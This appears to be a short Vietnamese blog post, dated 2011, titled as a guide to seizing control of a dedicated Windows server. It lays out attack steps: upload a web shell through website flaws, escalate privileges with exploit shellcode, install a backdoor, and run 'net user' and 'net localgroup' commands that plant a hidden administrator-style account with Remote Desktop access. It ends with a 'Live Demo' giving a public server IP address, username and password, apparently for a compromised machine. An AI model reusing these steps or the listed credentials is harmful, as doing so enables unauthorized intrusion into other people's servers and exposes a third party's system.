Skip to main content

Chiếm quyền Dedicated Windows Server (VPS)

[Các bước thực hiện]
{1} Trước tiên các bạn cần phải có 1 con Shell trên server có khả năng sử dụng command line (Ở đây các bạn có thể khai thác các lỗ hổng của website để up shell).
{2} Cần phải có full quyền Administrator/Root cho user. Nếu tài khoản user trên server đang sử dụng không có full quyền thì bạn có thể dùng exploit shellcode để khai thác nâng quyền.
{3} Sau khi có shell trên server, các bạn có thể cài backdoor hoặc sử dụng ngay chức năng run CMD trên shell của bạn.
{4} Tạo 1 user mới trên server bằng lệnh. Trong đó lht192 là User và 123456 là mật khẩu:

net user lht192 123456 /ADD
{5} Set quyền remote desktop cho user lht192 bằng lệnh:
net localgroup "Remote Desktop Users" lht192 /ADD
{6} Nếu thành công thì bạn sẽ nhận được kết quả trả về như sau:
The command completed successfully.
{7} Sử dụng chức năng Remote Desktop của Windows để kết nối và điều khiển server !

Live Demo [14/07/2011]:
Server IP: 210.245.81.159
Username: lht192
Password: lht192

Share